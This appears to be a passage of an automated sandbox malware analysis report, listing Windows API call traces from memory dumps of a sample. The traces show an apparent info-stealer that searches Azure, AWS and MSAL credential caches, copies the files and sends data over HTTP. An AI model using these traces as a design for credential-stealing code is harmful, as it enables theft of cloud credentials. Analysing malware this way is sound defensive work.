                                          • lstrlen.KERNEL32(00425318), ref: 022D48A4
                                          • lstrlen.KERNEL32(004253C0), ref: 022D48AF
                                          • lstrlen.KERNEL32(00425468), ref: 022D48C3
                                          • lstrlen.KERNEL32(00425510), ref: 022D48CE
                                          • lstrlen.KERNEL32(004255B8), ref: 022D48D9
                                          • lstrlen.KERNEL32(00425660), ref: 022D48E4
                                          • lstrlen.KERNEL32(00425708), ref: 022D48EF
                                          • lstrlen.KERNEL32(004257B0), ref: 022D4918
                                          • lstrlen.KERNEL32(00425858), ref: 022D4923
                                          • lstrlen.KERNEL32(00425920), ref: 022D492E
                                          • lstrlen.KERNEL32(004259C8), ref: 022D4939
                                          • lstrlen.KERNEL32(00425A70), ref: 022D4944
                                          • strlen.MSVCRT ref: 022D4957
                                          • lstrlen.KERNEL32(00425B18), ref: 022D497F
                                          • lstrlen.KERNEL32(00425BC0), ref: 022D498A
                                          • lstrlen.KERNEL32(00425C68), ref: 022D4995
                                          • lstrlen.KERNEL32(00425D10), ref: 022D49A0
                                          • lstrlen.KERNEL32(00425DB8), ref: 022D49AB
                                          • lstrlen.KERNEL32(00425E60), ref: 022D49BB
                                          • lstrlen.KERNEL32(00425F08), ref: 022D49C6
                                          • lstrlen.KERNEL32(00425FB0), ref: 022D49D1
                                          • lstrlen.KERNEL32(00426058), ref: 022D49DC
                                          • lstrlen.KERNEL32(00426100), ref: 022D49E7
                                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 022D4A03
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                          • String ID:
                                          • API String ID: 2127927946-0
                                          • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                          • Instruction ID: c92d7508e6709aee49e0be563c1c34b0bfca0015370bb95c55c0003eaa20f757
                                          • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                          • Instruction Fuzzy Hash: E241A879740624EBC718AFE5EC89B987F71AB4C712BA0C062F90299190CBF5D511DB3E
                                          APIs
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022E9B08
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022E9B21
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022E9B39
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022E9B51
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022E9B6A
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022E9B82
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022E9B9A
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022E9BB3
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022E9BCB
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022E9BE3
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022E9BFC
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022E9C14
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022E9C2C
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022E9C45
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 022E9C5D
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 022E9C75
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 022E9C8E
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 022E9CA6
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 022E9CBE
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 022E9CD7
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 022E9CEF
                                          • LoadLibraryA.KERNEL32(0064A550,?,022E6C67), ref: 022E9D01
                                          • LoadLibraryA.KERNEL32(0064A17C,?,022E6C67), ref: 022E9D12
                                          • LoadLibraryA.KERNEL32(0064A104,?,022E6C67), ref: 022E9D24
                                          • LoadLibraryA.KERNEL32(0064A1DC,?,022E6C67), ref: 022E9D36
                                          • LoadLibraryA.KERNEL32(0064A328,?,022E6C67), ref: 022E9D47
                                          • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 022E9D69
                                          • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 022E9D8A
                                          • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 022E9DA2
                                          • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 022E9DC4
                                          • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 022E9DE5
                                          • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 022E9E06
                                          • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 022E9E1D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID:
                                          • API String ID: 2238633743-0
                                          • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                          • Instruction ID: 53cb10b912881480f6cc348d60ee232ac40a3c26526d25caf30921e261c55479
                                          • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                          • Instruction Fuzzy Hash: 9CA14CBD5D0240BFE364EFE8ED88A963BFBF74E201704661AE605C3264D7399441DB12
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                            • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                            • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                            • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                            • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                            • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                            • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                          • strtok_s.MSVCRT ref: 022E0582
                                          • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 022E05C9
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022E05D0
                                          • StrStrA.SHLWAPI(00000000,00421618), ref: 022E05EC
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E05FA
                                            • Part of subcall function 022E8B47: malloc.MSVCRT ref: 022E8B4F
                                            • Part of subcall function 022E8B47: strncpy.MSVCRT ref: 022E8B6A
                                          • StrStrA.SHLWAPI(00000000,00421620), ref: 022E0636
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0644
                                          • StrStrA.SHLWAPI(00000000,00421628), ref: 022E0680
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E068E
                                          • StrStrA.SHLWAPI(00000000,00421630), ref: 022E06CA
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E06DC
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0769
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0781
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0799
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E07B1
                                          • lstrcat.KERNEL32(?,0042164C), ref: 022E07C9
                                          • lstrcat.KERNEL32(?,00421660), ref: 022E07D8
                                          • lstrcat.KERNEL32(?,00421670), ref: 022E07E7
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E07FA
                                          • lstrcat.KERNEL32(?,00421678), ref: 022E0809
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E081C
                                          • lstrcat.KERNEL32(?,0042167C), ref: 022E082B
                                          • lstrcat.KERNEL32(?,00421680), ref: 022E083A
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E084D
                                          • lstrcat.KERNEL32(?,00421688), ref: 022E085C
                                          • lstrcat.KERNEL32(?,0042168C), ref: 022E086B
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E087E
                                          • lstrcat.KERNEL32(?,00421698), ref: 022E088D
                                          • lstrcat.KERNEL32(?,0042169C), ref: 022E089C
                                          • strtok_s.MSVCRT ref: 022E08E0
                                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E08F5
                                          • memset.MSVCRT ref: 022E0944
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                          • String ID:
                                          • API String ID: 3689735781-0
                                          • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                          • Instruction ID: c70e8987a47bc3c3ee0f4c1b7c5d73c25ddfd72a9a95e22a47af87f929006125
                                          • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                          • Instruction Fuzzy Hash: 3FD14C75A20308ABCF04EBE4DD85EFE777AAF54300F904419E103A6198EE78AA45DF61
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                            • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                          • StrCmpCA.SHLWAPI(?,00978648), ref: 00405A13
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0097CFA0,00000000,?,00948EC0,00000000,?,00421A1C), ref: 00405E71
                                          • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                          • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                          • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                          • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                          • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                          • memcpy.MSVCRT(?), ref: 00405EFE
                                          • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                          • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                          • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                          • HttpOpenRequestA.WININET(00000000,0097D020,?,0097C5F8,00000000,00000000,00400100,00000000), ref: 00405BF8
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                          • String ID: "$"$------$------$------
                                          • API String ID: 1406981993-2180234286
                                          • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                          • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                          • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                          • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                          APIs
                                          • memset.MSVCRT ref: 00414D87
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                          • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                          • memset.MSVCRT ref: 00414E13
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                          • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                            • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                            • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                          • memset.MSVCRT ref: 00414E9F
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                          • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                            • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,009785D8,?,000003E8), ref: 00414A4A
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                            • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                            • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                          • memset.MSVCRT ref: 00414F2B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                          • API String ID: 4017274736-156832076
                                          • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                          • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                          • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                          • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00948EF0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                          • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                          • lstrcatA.KERNEL32(?,00000000,00978428,00421474,00978428,00421470,00000000), ref: 0040D208
                                          • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                          • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                          • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                          • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                          • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                          • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                          • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00946070,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                          • lstrlenA.KERNEL32(?), ref: 0040D32A
                                          • lstrlenA.KERNEL32(?), ref: 0040D339
                                          • memset.MSVCRT ref: 0040D388
                                            • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                          • String ID:
                                          • API String ID: 2775534915-0
                                          • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                          • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                          • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                          • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DD1EA
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022DD32E
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022DD335
                                          • lstrcat.KERNEL32(?,00000000), ref: 022DD46F
                                          • lstrcat.KERNEL32(?,00421478), ref: 022DD47E
                                          • lstrcat.KERNEL32(?,00000000), ref: 022DD491
                                          • lstrcat.KERNEL32(?,0042147C), ref: 022DD4A0
                                          • lstrcat.KERNEL32(?,00000000), ref: 022DD4B3
                                          • lstrcat.KERNEL32(?,00421480), ref: 022DD4C2
                                          • lstrcat.KERNEL32(?,00000000), ref: 022DD4D5
                                          • lstrcat.KERNEL32(?,00421484), ref: 022DD4E4
                                          • lstrcat.KERNEL32(?,00000000), ref: 022DD4F7
                                          • lstrcat.KERNEL32(?,00421488), ref: 022DD506
                                          • lstrcat.KERNEL32(?,00000000), ref: 022DD519
                                          • lstrcat.KERNEL32(?,0042148C), ref: 022DD528
                                          • lstrcat.KERNEL32(?,00000000), ref: 022DD53B
                                          • lstrcat.KERNEL32(?,00421490), ref: 022DD54A
                                            • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                            • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                          • lstrlen.KERNEL32(?), ref: 022DD591
                                          • lstrlen.KERNEL32(?), ref: 022DD5A0
                                          • memset.MSVCRT ref: 022DD5EF
                                            • Part of subcall function 022EACD7: StrCmpCA.SHLWAPI(0064A350,022DAA0E,?,022DAA0E,0064A350), ref: 022EACF6
                                          • DeleteFileA.KERNEL32(00000000), ref: 022DD61B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                          • String ID:
                                          • API String ID: 1973479514-0
                                          • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                          • Instruction ID: beaf0747bffc27c3fc1b1a3eea6341950931f12f600e6f84c59043fa2ccd1e59
                                          • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                          • Instruction Fuzzy Hash: 8CE14B75960308ABCF08FBE4DD95EEE737ABF64301F904159E107A61A4DE34AA08DF61
                                          APIs
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                            • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                            • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022D5C5F
                                          • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D5C7A
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D5DFA
                                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 022D60D8
                                          • lstrlen.KERNEL32(00000000), ref: 022D60E9
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 022D60FA
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D6101
                                          • lstrlen.KERNEL32(00000000), ref: 022D6116
                                          • memcpy.MSVCRT(?,00000000,00000000), ref: 022D612D
                                          • lstrlen.KERNEL32(00000000), ref: 022D613F
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022D6158
                                          • memcpy.MSVCRT(?), ref: 022D6165
                                          • lstrlen.KERNEL32(00000000,?,?), ref: 022D6182
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022D6196
                                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 022D61B3
                                          • InternetCloseHandle.WININET(00000000), ref: 022D6217
                                          • InternetCloseHandle.WININET(00000000), ref: 022D6224
